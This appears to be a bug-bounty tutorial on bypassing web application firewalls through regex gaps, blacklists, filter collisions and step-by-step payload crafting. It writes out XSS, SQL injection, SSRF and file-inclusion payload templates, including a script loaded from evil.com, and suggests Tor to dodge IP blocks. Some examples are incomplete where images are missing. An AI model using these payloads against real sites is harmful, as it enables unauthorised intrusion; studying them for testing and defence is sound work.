A web application firewall (WAF) is a program specially designed to filter, monitor and block malicious web requests according to its configuration.
The filtering and detection side of a WAF depends on two primary configurations: the black/white list and a regex. These configurations make it possible for a WAF to determine if a request contains malicious content.
In this article, we will discuss different ways a WAF can be bypassed when a vulnerability has been discovered.
The topic will focus on how to take advantage of the configurations and normalisation that could affect the way a payload is being handled in the transport. We will show different scenarios and examples of manipulations that lead to a successful bypass.
/ Regex and list tampering
Regex stands for regular expression and is a sequence of characters used to detect patterns inside its given content. In simple terms, a regex can be used to detect patterns in a source, which is a huge advantage when developing filter mechanisms for web application firewalls.
An example of how a regex could be used to find all words starting with the uppercase "Y":
Yes It's possible to hack on YesWeHack. You just need to sign up!
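As a minimal sketch, the same match can be reproduced with Python's `re` module. The pattern `\bY\w*` is an assumption chosen for illustration, since the regex used in the original example is not shown here.

```python
import re

text = "Yes It's possible to hack on YesWeHack. You just need to sign up!"

# \b anchors at a word boundary, Y is the literal uppercase letter,
# and \w* consumes the rest of the word.
pattern = re.compile(r"\bY\w*")

matches = pattern.findall(text)
print(matches)  # ['Yes', 'YesWeHack', 'You']
```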
If you want to dig deeper and practice custom regex, you can do so here.
Did you notice anything?
The last payload looks almost identical to the first but it’s not detected by the regex. Why?
This is because the regex is configured to detect a pattern only if it ends with a >, as in this case. Imagine how precise the regex has to be to be able to detect a pattern.
This is one of the many examples of how web application firewalls are being bypassed.
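The effect of an overly strict pattern can be sketched as follows. The regex below is a hypothetical stand-in for the one in the example, assumed only to require a closing `>`; the helper name `is_blocked` is also made up for illustration.

```python
import re

# Hypothetical WAF rule: a tag containing an onload handler, closed by ">".
strict_rule = re.compile(r"<.*onload=.*>")

def is_blocked(payload: str) -> bool:
    """Return True when the hypothetical rule matches the payload."""
    return strict_rule.search(payload) is not None

print(is_blocked("<svg onload=alert(1)>"))  # True
print(is_blocked("<svg onload=alert(1)"))   # False
```

The second payload differs only by the missing closing `>`, which is enough for this particular rule to miss it.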
So, what happens if we just remove the > at the end of the regex and keep the anything
Also known as:
This is bypassable because we take advantage of two techniques. First, the regex looks for a payload that starts with < and secondly it looks for any onload statement followed by an equal sign.
The last payload in the image takes advantage of the < symbol that the regex is searching for as a prefix. The payload splits into two pieces with the help of a newline.
The first payload piece starts with the < symbol and triggers the regex to start its pattern search. Then, when we add the newline to the payload, the regex is broken. The regex breaks because the .* checks for anything except newlines. This makes the payload undetectable.
Lastly, we add our final piece to the payload that includes the onerror=alert(1) part. The regex won’t detect the onerror statement since it’s not starting with the < symbol, which is needed to trigger the regex. It results in a successful bypass.
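The newline behaviour described above can be checked with a short sketch. The rule is a hypothetical reconstruction (a `<`, then anything, then an `onload` or `onerror` handler), not the exact regex from the example.

```python
import re

# Hypothetical rule: "<", then anything, then an onload/onerror handler.
# Without re.DOTALL, "." does not match a newline character.
rule = re.compile(r"<.*on(load|error)=")

single_line = "<img src=1 onerror=alert(1)>"
split_payload = "<img src=1\nonerror=alert(1)>"

print(bool(rule.search(single_line)))    # True
print(bool(rule.search(split_payload)))  # False

# The same rule compiled with re.DOTALL lets "." cross the newline.
dotall_rule = re.compile(r"<.*on(load|error)=", re.DOTALL)
print(bool(dotall_rule.search(split_payload)))  # True
```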
A WAF also uses different word lists to detect payloads by searching for words inside the request. If it detects a word within the given blacklist in the request, the request will be blocked by the WAF. The opposite type of list is the whitelist. This word list contains words which are allowed to be used or that are strictly needed within an input.
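A blacklist check of this kind might look like the sketch below. The words are taken from the word list shown later in this article; the function name and the case-insensitive substring matching are assumptions for illustration.

```python
# Words borrowed from the blacklist used later in this article.
BLACKLIST = {"alert", "confirm", "prompt", "iframe", "script", "style", "base"}

def blocked_words(request_body: str) -> list:
    """Return the blacklisted words found in the request, case-insensitively."""
    lowered = request_body.lower()
    return sorted(word for word in BLACKLIST if word in lowered)

print(blocked_words("<ScRiPt>alert(1)</script>"))  # ['alert', 'script']
print(blocked_words("<svg>"))                      # []
```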
Let’s upgrade the regex filter and add all previous bypass methods to fix bypasses related to newlines.
.*|\n simply means (anything or newlines)
alert confirm prompt iframe script style base
The regex didn’t detect <img src=1 but detected the onerror=alert(1) part at the second last payload. This results in a WAF block, but in a real world scenario you would have gotten a forbidden/block page without being aware of the fact that half of your payload was successful.
That’s a reason why it’s very important to take one step at a time when crafting a payload (more on that later).
So how did the latest payload bypass the regex?
This is because we have configured the regex to detect anything OR newlines, on(.*|\n)=, and not both of them combined.
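A minimal sketch of why the alternation fails: `(.*|\n)` matches either a run of non-newline characters or a single newline, never one followed by the other. The test strings and the `[\s\S]*?` alternative are assumptions added for illustration.

```python
import re

# Rule from the discussion: "on", then anything OR one newline, then "=".
either_rule = re.compile(r"on(.*|\n)=")

print(bool(either_rule.search("onerror=alert(1)")))    # True  (only "anything")
print(bool(either_rule.search("on\n=alert(1)")))       # True  (only a newline)
print(bool(either_rule.search("onerror\n=alert(1)")))  # False (text AND a newline)

# A character class that covers both cases matches the combined form.
combined_rule = re.compile(r"on[\s\S]*?=")
print(bool(combined_rule.search("onerror\n=alert(1)")))  # True
```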
I think you get the point. It is very difficult to configure a firewall to detect all kinds of patterns. Because the payload is so extremely flexible, the payload is always one step ahead.
/ Firewall and frontend/backend filter
It’s important not to mix up firewall filters with frontend and backend filters. You might be able to bypass the firewall but that doesn’t mean you actually found a vulnerability within the system itself. Remember that the firewall’s purpose is to provide an extra layer of protection and detection against malicious requests.
If the frontend and/or backend do not filter/escape properly, this would likely instead be a vulnerability. This isn’t the case if it’s within the web application firewall filters since the firewall does not protect an actual input handler.
A good example would be the following:
<img src='1' onerror='alert(1)'>
Scenario 1. Payload blocked:
Scenario 2. Payload bypassed:
The WAF transfers the request to the backend code
<p>no result for: <b><img src='1' onerror='alert(1)'></b></p>
Web application firewall bypassed and vulnerability exploited, resulting in cross-site scripting (XSS).
In this case, the firewall was bypassed and the backend was vulnerable to an XSS injection because it didn’t escape dangerous chars in the user input.
If the backend were to escape the search GET parameter ($input variable), the result would be that the WAF was bypassed but the input itself was not vulnerable to XSS.
Backend programming language PHP – htmlspecialchars()
<p>No result for: <b>&lt;img src=&#039;1&#039; onerror=&#039;alert(1)&#039;&gt;</b></p>
Web application firewall bypassed but search parameter wasn't vulnerable.
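The difference between the two backends can be sketched as follows. Python's `html.escape` is used here as a stand-in for PHP's `htmlspecialchars()`; the two template functions are hypothetical and only mirror the search page from the example.

```python
import html

def render_unsafe(search_term: str) -> str:
    """Hypothetical vulnerable template: the input is reflected as-is."""
    return f"<p>no result for: <b>{search_term}</b></p>"

def render_escaped(search_term: str) -> str:
    """Same template, with HTML metacharacters escaped before reflection."""
    return f"<p>No result for: <b>{html.escape(search_term, quote=True)}</b></p>"

payload = "<img src='1' onerror='alert(1)'>"
print(render_unsafe(payload))   # the <img> tag reaches the page intact
print(render_escaped(payload))  # the tag is rendered as harmless text
```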
When trying to bypass a WAF, it is very important to first determine how the frontend/backend filter works before attempting to exploit it. If the entrance is not vulnerable, what is the point of bypassing the firewall?
/ Normalisation and filter collision
In many cases, frontend, backend and/or technologies such as proxies cause not only normalisation but also filter collisions. A filter collision occurs when there are two or more filters that have a similar task in common.
Example of a simple collision
Imagine that we use a payload as follows:
- The browser will URL encode the char " and then transfer it to the web application firewall.
Payload → ywh%22
- The WAF sees no suspected content and the payload continues to the frontend, which escapes the quote with a backslash.
Payload → ywh\"
5. The backend deletes all quotes in the input to avoid quotes altogether. (Collides with frontend filter)
Payload → ywh\
6. When the payload reflects in the frontend response, it will appear as
The end result: you are now able to take advantage of this collision for a lot of different payloads. Since the quotes are deleted and leave the \ alone, you could use them to bypass URL verification or escape backslash itself with \\" that will result in
Take advantage of all the different behaviours of the target when bypassing the web application firewall.
Example custom payloads related to the collision
SSRF → http:""localhost
XSS (that includes links etc) → src='""://evil.com/xss.js'
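The collision can be simulated in a few lines. Both filter functions are hypothetical reconstructions of the behaviour described in the steps above (a frontend that escapes double quotes with a backslash and a backend that deletes them), not code from a real target.

```python
from urllib.parse import unquote

def frontend_filter(value: str) -> str:
    """Hypothetical frontend filter: escape double quotes with a backslash."""
    return value.replace('"', '\\"')

def backend_filter(value: str) -> str:
    """Hypothetical backend filter: delete every double quote."""
    return value.replace('"', "")

def through_filters(url_encoded: str) -> str:
    decoded = unquote(url_encoded)  # the server decodes the URL encoding
    return backend_filter(frontend_filter(decoded))

print(through_filters("ywh%22"))                # ywh\
print(through_filters("http:%22%22localhost"))  # http:\\localhost
```

Under these assumptions, each quote in the input leaves a lone backslash behind, which is what the custom payloads above rely on.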
/ Payload preparation
The main challenge when trying to adapt a bypassable payload is to determine how the payload is understood by the web application firewall. Since a WAF only responds with a forbidden page or lets the payload pass, we need to take small steps forward to build up a payload.
The payload should contain only the characters that are necessary for the type of vulnerability you are trying to exploit. This will provide a better understanding of how the payload is managed and changes during the process.
There are lots of different ways to customise a payload. Besides, depending on the vulnerability, there are different characters that are particularly important to include for a successful payload.
Example: (Not limited to)
- SQL injections:
- Cross-site Scripting:
- Template Injection:
- PHP code injection:
- Local file include:
There is no need to use onload if the firewall does not protect against the HTML tag <script> and there is no need to use the symbols > if we inject within an HTML tag.
The same goes for SQL injection, Template injection or other types of vulnerabilities that need a payload to be exploited properly. Create and adapt a payload from the location where it is placed.
There are some good payloads out there, but if you want to be able to bypass WAFs at an advanced level, most of these payloads are not the solution. However, taking notes from them and storing template payloads are good strategies.
Consider a simple payload as follows:
The payload itself does not exploit anything. The first step is actually getting blocked. It may sound strange, but it’s the first step in creating a payload that can bypass the WAF. The only situation where this technique can be bad is if the firewall blocks you permanently. In these cases, you can use proxies that allow you to change IP addresses frequently. Tor can be useful in these situations.
Most WAFs block this payload directly because it contains the HTML tag <script>, which is often used in XSS payloads. If this had been a SQL injection, the payload ' or 1=1 -- - would have been a good choice to use, since it is obvious that it will be blocked.
So why do we want a blocked payload?
Because it’s not possible to adapt a payload to bypass a WAF without knowing how the WAF sees the input. Common payloads make a good core because they provide direct feedback from the firewall, which makes reconnaissance of the firewall configuration easier. Most of the time, the firewall will be even stricter because we trigger more of its filters.
Payload: <script>
<, > -> are probably within the regex pattern
script -> is probably inside the blacklist
To continue the process, we will now start adjusting the payload until we have got the information we need. Each time the payload gets blocked or passes, you get more feedback on how you can adjust your payload to bypass the WAF.
If the firewall only blocks the request but not the host it came from, it’s possible to automate some parts.
An example of an automated process could be:
Example of a WAF reconnaissance process
Using the steps in the <script> payload, we now have an understanding of how the WAF filters its input data. We successfully managed to collect working tampers that we can work with to build a fully functional payload that will bypass the firewall.
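A reconnaissance loop of this kind could be sketched as below. The toy WAF is purely an assumption that stands in for the real target so the example runs offline; against a real target, the `is_blocked` callback would instead send the request and check for the forbidden/block page.

```python
import re

# Stand-in for the real target: a toy WAF with one regex and a small blacklist.
# Both are assumptions for illustration; a real WAF is only observable
# through its block/pass responses.
TOY_REGEX = re.compile(r"<.*>")
TOY_BLACKLIST = ("script", "alert")

def toy_waf_blocks(payload: str) -> bool:
    lowered = payload.lower()
    return bool(TOY_REGEX.search(payload)) or any(w in lowered for w in TOY_BLACKLIST)

def probe(candidates, is_blocked):
    """Send each candidate alone and record whether it was blocked."""
    return {candidate: is_blocked(candidate) for candidate in candidates}

# Break "<script>" into small pieces to learn which part triggers the block.
pieces = ["<", ">", "<x", "<x>", "script", "scr", "<scr>"]
results = probe(pieces, toy_waf_blocks)
for piece, blocked in results.items():
    print(f"{piece!r:10} -> {'blocked' if blocked else 'passed'}")
```

With this toy configuration, `<` and `>` pass on their own but are blocked as a pair, and `script` is blocked while `scr` passes, which matches the kind of conclusions drawn from the `<script>` payload.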
/ Payload templates
These are core templates and there are lots of different types that you can use and create yourself. Always use the characters and combinations that give the best feedback from the web application firewall.
Cross-site scripting
<script> <svg> <iframe> <base> <img onx=1 //Can later be tested with: '0"><x <1337onx=1> </x> "<x>" <x"0'x
SQL injection
' or 1=1 -- x \'or+1='' ' x 1=1 sleep(4) '||1 ' select x //Can later be tested with: or/**/and/**/ ' x=1 x')or('x
Local file inclusion
/etc/passwd etcpasswd ..;/..;/ x../../x ../ //Can later be tested with: ../.. 1337../ ../..x.png ./././ .:./.:./ .%00./x.php
The methodology covers the different paths from when a vulnerability is detected but blocked by the web application firewall, which prevents the payload from successfully exploiting the vulnerability.
Analyse the types of chars that can be used in the payload.
Detect whether any normalisation occurs, related to the technology used by the target, that may affect the transport of the payload and/or modify its content.
Determine how the frontend and/or backend filters adjust the payload and then use that against the web application firewall (Delete, Replace, Append, Add chars etc…).
Look for collisions between frontend and backend filters (if any). This is rare, but in some vulnerabilities it is possible to take advantage of the vulnerable input behavior to bypass the web application firewall as well.
With each attempt, add a new piece to your payload to map out the firewall regex.
Black and white lists
Once the basics of the WAF regex are known, add strings that may be on the white/black list to the payload to analyse in which areas they can and cannot be used.
Analyse the results of the different payloads used. Use this technique to adjust and update the next payload that will be used.
/ Firewall weaknesses
This is based on successful techniques that have repeatedly managed to bypass the same web application firewall at different companies.
- Newlines that split the payload
- Overload of parentheses
- Payloads do not include spaces
- Weak blacklist
- Base64 encode
- Newlines that split the payload
- Math to set or compare values
- Multi-line comment with backslashes manipulation
- Double URL encoding
- Base64 encode
- Early discovered
- Space before parentheses/backticks
- Payloads do not include spaces
When payloads are presented inside quotes.
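One of the weaknesses listed above, double URL encoding, can be illustrated with a short sketch. The toy WAF (which decodes once) and the toy backend (which ends up decoding twice) are assumptions made for the example and do not describe any specific product.

```python
from urllib.parse import quote, unquote

payload = "<script>"

once = quote(payload, safe="")   # %3Cscript%3E
twice = quote(once, safe="")     # %253Cscript%253E

def toy_waf_blocks(raw_value: str) -> bool:
    """Hypothetical WAF: URL-decodes the value once, then looks for '<'."""
    return "<" in unquote(raw_value)

def toy_backend_decode(raw_value: str) -> str:
    """Hypothetical backend that ends up decoding the value twice."""
    return unquote(unquote(raw_value))

print(toy_waf_blocks(once))       # True
print(toy_waf_blocks(twice))      # False
print(toy_backend_decode(twice))  # <script>
```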